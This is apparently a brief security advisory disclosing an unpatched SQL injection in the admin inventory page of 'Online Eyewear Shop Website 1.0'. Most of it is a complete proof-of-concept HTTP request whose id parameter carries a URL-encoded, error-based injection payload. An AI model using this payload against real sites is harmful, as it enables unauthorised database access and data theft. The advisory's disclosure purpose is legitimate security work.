- Online Eyewear Shop Website: 1.0
- Vulnerability Type: SQL Injection
- Severity: CRITICAL
- Status: Unpatched
/admin/?page=inventory/view_inventory&id=2
/admin/inventory/view_inventory
The Online Eyewear Shop Website version 1.0 contains a critical SQL injection vulnerability. An attacker can exploit this issue by manipulating the id parameter within the inventory viewing page of the admin panel (/admin/?page=inventory/view_inventory&id=2). By doing so, an attacker can retrieve sensitive data directly from the backend database, leading to potential data breaches.
Below is a sample HTTP request that demonstrates the SQL injection vulnerability by exploiting the id parameter:
GET /admin/?page=inventory/view_inventory&id=2%27%20%41%4e%44%20%47%54%49%44%5f%53%55%42%53%45%54%28%43%4f%4e%43%41%54%28%30%78%37%31%36%61%37%38%36%61%37%31%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%32%36%32%33%3d%32%36%32%33%2c%31%29%29%29%2c%30%78%37%31%36%32%37%30%36%32%37%31%29%2c%32%36%32%33%29%2d%2d%20%6c%65%61%65 HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
sec-ch-ua: "Not;A=Brand";v="24", "Chromium";v="128"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f;
Connection: keep-alive
